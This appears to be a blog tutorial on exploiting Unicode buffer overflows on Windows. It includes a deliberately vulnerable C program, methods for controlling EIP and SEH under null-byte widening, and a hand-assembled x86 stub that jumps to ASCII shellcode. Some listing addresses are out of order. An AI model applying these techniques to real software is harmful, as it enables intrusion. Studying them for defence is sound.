EIP = 0x00410041 ?? Exploiting Unicode Buffer Overflows
Hello all =)
I’m writing this post in English (poor English, sorry) because I may link to this article from other sites. You can also download the French version here : Unicode Buffer Overflows Exploitation – French Version.pdf
Introduction :
Maybe you have already run into trouble while exploiting a buffer overflow : you send a string like « AAAA… » and end up with EIP = 0x00410041 instead of the expected 0x41414141. Maybe you haven’t, but I think it is very interesting to understand when this case can occur and what causes it.
Understanding Unicode Strings :
First of all, I’m going to briefly present how Unicode strings work. Unicode was created so that every language can be used in any country without transliteration problems. For example, Arabic characters are different from ours : a string like مهمءضك cannot be represented with the ASCII codes we know. With Unicode strings it is possible to use any kind of character. You can find a great overview of Unicode characters here.
I won’t explain more about Unicode strings ; I’m now going to show you how to use them.
Using Unicode Strings :
In C, there is a list of functions for manipulating Unicode strings on Windows : Unicode Functions.
Let us take a look at the ASCII/Unicode conversion functions :
- MultiByteToWideChar() : ASCII -> Unicode :
int MultiByteToWideChar(
    UINT CodePage,
    DWORD dwFlags,
    LPCSTR lpMultiByteStr,
    int cbMultiByte,
    LPWSTR lpWideCharStr,
    int cchWideChar
);
- WideCharToMultiByte() : Unicode -> ASCII :
int WideCharToMultiByte(
    UINT CodePage,
    DWORD dwFlags,
    LPCWSTR lpWideCharStr,
    int cchWideChar,
    LPSTR lpMultiByteStr,
    int cbMultiByte,
    LPCSTR lpDefaultChar,
    LPBOOL lpUsedDefaultChar
);
I draw your attention to the CodePage parameter :
- CodePage
- [in] Code page used to perform the conversion.
You can set this parameter to any code page that is installed or available in the system. You can also specify one of the values shown in the following table.
Value            Description
CP_ACP           ANSI code page
CP_MACCP         Not supported
CP_OEMCP         OEM code page
CP_SYMBOL        Not supported
CP_THREAD_ACP    Not supported
CP_UTF7          UTF-7 code page
CP_UTF8          UTF-8 code page
When SYSGEN_LOCUSA is set, only the 1252 and 437 code pages are supported.
To create an image that has very limited locale support, specify the image with SYSGEN_CORELOC and put the necessary locales for the image into Public\Common\Oak\Files\Nlscfg.inf.
When converting an ASCII string to Unicode, the result depends on the code page used. An example of conversion :
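#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 56

int main(int argc, char *argv[])
{
    wchar_t wcStr[SIZE];
    char cStr[SIZE];
    int n;

    memcpy(cStr, "\xB0\x42\x43\x44", 4);
    /* Convert the 4 bytes with the OEM code page; the return value is the number of wide characters written */
    n = MultiByteToWideChar(CP_OEMCP, 0, cStr, 4, wcStr, SIZE - 1);
    wcStr[n] = L'\0'; /* the 4 input bytes carry no terminator, so add one */
    printf("%ws", wcStr);
    printf("\n\n");
    system("pause");
    return 0;
}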
Here I’m using the OEM code page.
Now let us have a look at the memory :
It seems that each character is followed by a null byte. In fact « ABCD » = 41 42 43 44 becomes « A.B.C.D. » = 4100 4200 4300 4400.
Actually, characters up to 0x7F follow this principle. But if you use a character above 0x7F, it won’t necessarily be the case.
Indeed, with the OEM code page, 0xB0 becomes the two bytes 91 25 in memory (the code unit 0x2591 stored in little-endian order). You can find a great conversion table here : Practical Win32 and Unicode exploitation.
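The widening rule described above can be reproduced without the Windows API. The following is only a minimal sketch : the helper names oem_to_utf16 and widen_bytes are made up for the illustration, the OEM code page is assumed to be 437, and only the two special bytes quoted in this article are filled in (every other byte above 0x7F is replaced by '?').

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: maps one input byte to a UTF-16 code unit.
   Bytes up to 0x7F map to themselves. Assumption: code page 437,
   with only the two entries quoted in the article filled in. */
uint16_t oem_to_utf16(uint8_t b)
{
    if (b <= 0x7F)
        return b;
    switch (b) {
    case 0xB0: return 0x2591;
    case 0xC0: return 0x2514;
    default:   return 0x003F; /* '?' placeholder for bytes not in this sketch */
    }
}

/* Writes the little-endian UTF-16 bytes for `in` into `out` and
   returns the number of bytes written (two per input byte). */
size_t widen_bytes(const uint8_t *in, size_t n, uint8_t *out, size_t out_cap)
{
    size_t i;

    assert(out_cap >= 2 * n); /* the caller must provide enough room */
    for (i = 0; i < n; i++) {
        uint16_t u = oem_to_utf16(in[i]);
        out[2 * i]     = (uint8_t)(u & 0xFF); /* low byte first */
        out[2 * i + 1] = (uint8_t)(u >> 8);   /* then high byte */
    }
    return 2 * n;
}
```

Calling widen_bytes on B0 42 43 44 fills the output with 91 25 42 00 43 00 44 00, which is the memory layout discussed above.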
Ok now what about Unicode buffer overflows ?
Redirecting the program flow :
Rewriting the RET address :
This is an example of a program which will crash because of a stack overflow with Unicode strings :
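#include <windows.h>
#include <string.h>
#include <wchar.h>

#define SIZE 56

int main(int argc, char *argv[])
{
    /* 32 'A' bytes; sizeof also counts the terminating null */
    static const char payload[] =
        "\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41";
    wchar_t wcBofMe[1];
    wchar_t wcStr[SIZE];
    char cStr[SIZE];

    memcpy(cStr, payload, sizeof(payload));
    /* -1 : convert up to and including the terminating null */
    MultiByteToWideChar(CP_OEMCP, 0, cStr, -1, wcStr, SIZE);
    wcscpy(wcBofMe, wcStr); // Will crash : 33 wide characters copied into a 1-element buffer
    return 0;
}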
When running this program, it crashes and EIP is 0x00410041 :
We clearly see that we control only 2 of the 4 bytes that make up the EIP register. This is a real problem : it is difficult to find a JMP ESP, for example, at an address of the form 0x00yy00zz.
But remember what I said : some bytes (> 0x7F) have a special translation in Unicode with the OEM code page. For example 0xC0 becomes the two bytes 14 25 in memory (the code unit 0x2514). So I’ve modified my string and I obtain :
So we can actually overwrite all 4 bytes of EIP. There is a plugin for OllyDbg which lets you find Unicode-format addresses (0x00yy00zz) of JMP ESP, CALL ESP, … instructions : OllyUNI. Another plugin exists for Immunity Debugger : pvefindaddr.
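To make the address format concrete : two plain ASCII characters, once widened, occupy the bytes zz 00 yy 00 in memory, which reads as the 32-bit value 0x00yy00zz. The function below is a minimal sketch of that test only. Its name is made up for the illustration, it ignores the extra addresses reachable through bytes above 0x7F, and it does not claim to reflect how OllyUNI or pvefindaddr are implemented.

```c
#include <stdint.h>

/* Returns 1 when addr has the form 0x00yy00zz with yy and zz in 0x01..0x7F,
   i.e. a value that two plain ASCII characters produce after widening. */
int is_unicode_format(uint32_t addr)
{
    uint32_t hi = (addr >> 16) & 0xFFFFu; /* 0x00yy */
    uint32_t lo = addr & 0xFFFFu;         /* 0x00zz */

    return hi >= 0x01u && hi <= 0x7Fu && lo >= 0x01u && lo <= 0x7Fu;
}
```

With this definition 0x00410041 passes, while a typical system DLL address such as 0x7C9D30D7 does not.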
SEH rewriting :
We know there is another method to redirect the program flow : SEH overwriting. With Unicode strings the principle is the same (overwrite the SEH Handler address with a pointer to a POP POP RET instruction sequence), but we won’t be able to use a JMP SHORT. Writing a JMP SHORT with a Unicode string is almost impossible, and it depends too much on the code page used.
So the principle is not to make a JMP SHORT but to let the program execute the bytes contained in Next SEH and SEH Handler as ordinary instructions, hoping it won’t crash. Then, if these instructions do no harm, we will be able to execute a shellcode located after the SEH structure. I know it is a bit difficult to understand, so just look at this diagram :
Steps 1 and 2 pose no problem.
But step 3 is trickier and requires two conditions :
- The bytes of the Next SEH address, when executed as instructions, must not cause any harm.
- Similarly, the bytes of the SEH Handler address must not raise an exception when executed.
Here is an example of an address which can cause a problem : 0x41560020
0020    ADD BYTE PTR DS:[EAX],AH
56      PUSH ESI
41      INC ECX
Here, if EAX contains a value like 0x00000000, an « Access violation » exception is raised when executing
ADD BYTE PTR DS:[EAX],AH
Exploiting Unicode Buffer Overflows :
RET on ASCII shellcode :
When we convert an ASCII string to a Unicode one, the original ASCII string still remains in memory. So if we can jump to it, we will be able to execute a « normal » shellcode. But how can we make a jump ? As I told you before, it is almost impossible to make a jump with a Unicode shellcode…
So we have to find another solution. I suggest reading this paper, which deals with the instructions we can use under Unicode constraints : Building IA32 ‘Unicode-Proof’ Shellcodes.
In my case I want to jump to the address 0x0022FD88, which points to my ASCII shellcode.
So I will use this Unicode shellcode :
0040139D  B8 00220000   MOV EAX,2200     ; EAX = 00002200
004013A2  50            PUSH EAX
004013A3  4C            DEC ESP
004013A4  58            POP EAX          ; EAX = 002200??
004013A5  05 00FD0000   ADD EAX,0FD00    ; EAX = 0022FD??
004013AF  B0 00         MOV AL,0         ; EAX = 0022FD00
004013AA  B9 00880000   MOV ECX,8800     ; ECX = 00008800
004013B1  00E8          ADD AL,CH        ; EAX = 0022FD88
00401284  50            PUSH EAX
00401285  C3            RETN
A piece of advice : when you need an address like 0xTTUUVVWW, begin by setting TT, then UU, and so on. It is much less complicated.
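The register comments in the listing above can be checked by replaying the arithmetic with plain integers. This is only a sketch : the function name build_target and its parameter are made up for the illustration, and the small array stands in for the real stack. The parameter is the unknown byte (the « ?? ») that sits just below the pushed value.

```c
#include <stdint.h>

/* Replays the listing step by step and returns the final EAX.
   `below` is the unknown byte located one byte under the pushed dword. */
uint32_t build_target(uint8_t below)
{
    uint8_t stack[8] = {0};
    uint32_t eax, ecx;

    eax = 0x00002200u;                 /* MOV EAX,2200 */

    /* PUSH EAX : store EAX in little-endian order at stack[4..7] */
    stack[4] = (uint8_t)(eax);
    stack[5] = (uint8_t)(eax >> 8);
    stack[6] = (uint8_t)(eax >> 16);
    stack[7] = (uint8_t)(eax >> 24);
    stack[3] = below;                  /* whatever was already there */

    /* DEC ESP then POP EAX : read four bytes starting one byte lower */
    eax = (uint32_t)stack[3]
        | ((uint32_t)stack[4] << 8)
        | ((uint32_t)stack[5] << 16)
        | ((uint32_t)stack[6] << 24);  /* EAX = 002200?? */

    eax += 0x0000FD00u;                /* ADD EAX,0FD00 : EAX = 0022FD?? */
    eax &= 0xFFFFFF00u;                /* MOV AL,0      : EAX = 0022FD00 */
    ecx = 0x00008800u;                 /* MOV ECX,8800  : CH  = 88       */

    /* ADD AL,CH : only the low byte of EAX changes */
    eax = (eax & 0xFFFFFF00u)
        | (uint8_t)((eax & 0xFFu) + ((ecx >> 8) & 0xFFu));
    return eax;
}
```

Whatever value the unknown byte has, the function returns 0x0022FD88, because MOV AL,0 clears that byte before the final ADD.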
It is also important to understand how to « play » with the ESP register and the POP/PUSH instructions. Now if you consider my string :
B8 00 22 00 00 50 4C 58 05 00 FD 00 00 B0 00 B9 00 88 00 00 00 E8, you see that there is no null byte between 50 and 4C, for example, whereas the Unicode conversion puts one after each character.
Well, it is not critical. In fact there are instructions whose opcodes look like this : 00 XX 00. Placed between two single-byte instructions, they absorb the extra null bytes. In my case I will use :
004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH
So I obtain this shellcode :
0040139D  B8 00220000   MOV EAX,2200               ; EAX = 00002200
004013A2  50            PUSH EAX
004013C6  0072 00       ADD BYTE PTR DS:[EDX],DH
004013A3  4C            DEC ESP
004013C6  0072 00       ADD BYTE PTR DS:[EDX],DH
004013A4  58            POP EAX                    ; EAX = 002200??
004013C6  0072 00       ADD BYTE PTR DS:[EDX],DH
004013A5  05 00FD0000   ADD EAX,0FD00              ; EAX = 0022FD??
004013AF  B0 00         MOV AL,0                   ; EAX = 0022FD00
004013AA  B9 00880000   MOV ECX,8800               ; ECX = 00008800
004013B1  00E8          ADD AL,CH                  ; EAX = 0022FD88
004013C6  0072 00       ADD BYTE PTR DS:[EDX],DH
00401284  50            PUSH EAX
004013C6  0072 00       ADD BYTE PTR DS:[EDX],DH
00401285  C3            RETN
Now my string is ok. We just have to build an ASCII shellcode.
Using a decoder :
But imagine that you can’t return to your ASCII string. You will have to write a Unicode shellcode, and writing a shellcode directly in Unicode is far too difficult. Nevertheless, there is a technique based on Venetian shellcodes. Tools like alpha2 encode an ASCII shellcode into a Unicode-compatible one, which is then decoded at run time by a (Unicode-compatible) decoder. After the decoder has run, we just have to jump to the original shellcode. But this method requires one condition :
- At least one register, and preferably two (EAX and ECX for example), must be usable as pointers : one to the encoded shellcode and the other to a writable memory area. However, it is possible with just one register pointing to the encoded shellcode, which then modifies itself.
You may ask why we need a register which points to the shellcode. Well, as I told you, there are a few instructions whose opcodes look like this : 00 XX 00. These are instructions we can use, and they are similar to the one I’ve already used :
0072 00 ADD BYTE PTR DS:[EDX],DH
In this case, if EDX points to our shellcode, we are able to modify it via DH.
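What this instruction does to memory can be modelled in a few lines. This is only a sketch under simplifying assumptions : the array mem is a made-up flat memory of 64 KB and the function name is chosen for the illustration. One detail worth noticing is that DH is bits 8 to 15 of EDX itself, so the pointer and the value added are not independent.

```c
#include <stdint.h>

/* Hypothetical flat memory used only for this illustration. */
#define MEM_SIZE 0x10000u
uint8_t mem[MEM_SIZE];

/* Models 00 72 00 = ADD BYTE PTR DS:[EDX],DH.
   The addition wraps around modulo 256, as on the real CPU. */
void add_byte_ptr_edx_dh(uint32_t edx)
{
    uint8_t dh = (uint8_t)(edx >> 8); /* DH = bits 8..15 of EDX */
    uint32_t where = edx % MEM_SIZE;  /* keep the sketch inside its array */

    mem[where] = (uint8_t)(mem[where] + dh);
}
```

For example, with EDX = 0x1234 and a byte 0x10 stored at that offset, the byte becomes 0x10 + 0x12 = 0x22.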
Here is a little list of instructions of this kind :
CPU Disasm
Address   Hex dump   Command
00401220  0060 00    ADD BYTE PTR DS:[EAX],AH
00401223  0061 00    ADD BYTE PTR DS:[ECX],AH
00401226  0062 00    ADD BYTE PTR DS:[EDX],AH
00401229  0063 00    ADD BYTE PTR DS:[EBX],AH
0040123E  006A 00    ADD BYTE PTR DS:[EDX],CH
00401241  006B 00    ADD BYTE PTR DS:[EBX],CH
00401253  0071 00    ADD BYTE PTR DS:[ECX],DH
00401256  0072 00    ADD BYTE PTR DS:[EDX],DH
00401259  0073 00    ADD BYTE PTR DS:[EBX],DH
00401262  0076 00    ADD BYTE PTR DS:[ESI],DH
00401265  0078 00    ADD BYTE PTR DS:[EAX],BH
00401268  0079 00    ADD BYTE PTR DS:[ECX],BH
0040126B  007A 00    ADD BYTE PTR DS:[EDX],BH
0040126E  007B 00    ADD BYTE PTR DS:[EBX],BH
00401277  007E 00    ADD BYTE PTR DS:[ESI],BH
0040127A  007F 00    ADD BYTE PTR DS:[EDI],BH
These instructions can also be very useful when adjusting the Unicode shellcode that jumps to the ASCII string (previous method).
Conclusion
I’m sorry for not illustrating this post more, but I don’t have the time. Maybe I will give you some examples soon in another post.
This article was a very short introduction to Unicode buffer overflows, so I will end by recommending an excellent and much more comprehensive paper on this topic : Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc by Peter Van Eeckhoutte.
Some Unicode Buffer Overflows exploits :